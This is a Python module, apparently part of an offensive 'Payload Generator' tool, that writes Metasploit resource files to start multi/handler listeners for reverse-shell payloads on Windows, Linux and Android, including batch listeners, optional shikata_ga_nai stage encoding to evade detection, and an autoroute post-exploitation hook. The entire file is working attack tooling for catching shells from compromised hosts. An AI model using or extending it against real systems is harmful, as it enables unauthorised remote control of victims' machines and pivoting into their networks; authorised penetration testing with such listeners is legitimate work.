#!/usr/bin/env python3
# listeners/rc_generator.py

from datetime import datetime

class ListenerGenerator:
    """Generate Metasploit resource (.rc) files for listeners"""
    
    def generate_listener(self, platform, payload_name, lhost, lport):
        """
        Generate listener RC file content
        """
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        
        rc_content = f"""# Metasploit Listener
# Generated by Payload Generator on {timestamp}
# Platform: {platform}
# Payload: {payload_name}
# LHOST: {lhost}
# LPORT: {lport}

use exploit/multi/handler
set payload {payload_name}
set LHOST {lhost}
set LPORT {lport}
set ExitOnSession false

# Optional: Enable for better handling
# set EnableStageEncoding true
# set StageEncoder x86/shikata_ga_nai

# Auto-run commands when session is created
# set AutoRunScript post/multi/manage/autoroute

exploit -j -z
"""
        
        # Add platform-specific options
        if platform == 'windows':
            rc_content += """
# Windows specific options
set DisablePayloadHandler false
"""
        elif platform == 'linux':
            rc_content += """
# Linux specific options
"""
        elif platform == 'android':
            rc_content += """
# Android specific options
"""
        
        return rc_content
    
    def generate_multi_listener(self, payloads):
        """
        Generate listener for multiple payloads (batch mode)
        """
        timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        
        rc_content = f"""# Metasploit Multi-Listener
# Generated by Payload Generator on {timestamp}
# This file will handle multiple payloads

"""
        
        for i, payload in enumerate(payloads, 1):
            rc_content += f"""
# Listener {i}: {payload['name']}
use exploit/multi/handler
set payload {payload['name']}
set LHOST {payload['lhost']}
set LPORT {payload['lport']}
set ExitOnSession false
exploit -j -z

"""
        
        rc_content += """
# Show all active jobs
jobs -v

# To interact with sessions:
# sessions -l
# sessions -i <id>
"""
        
        return rc_content
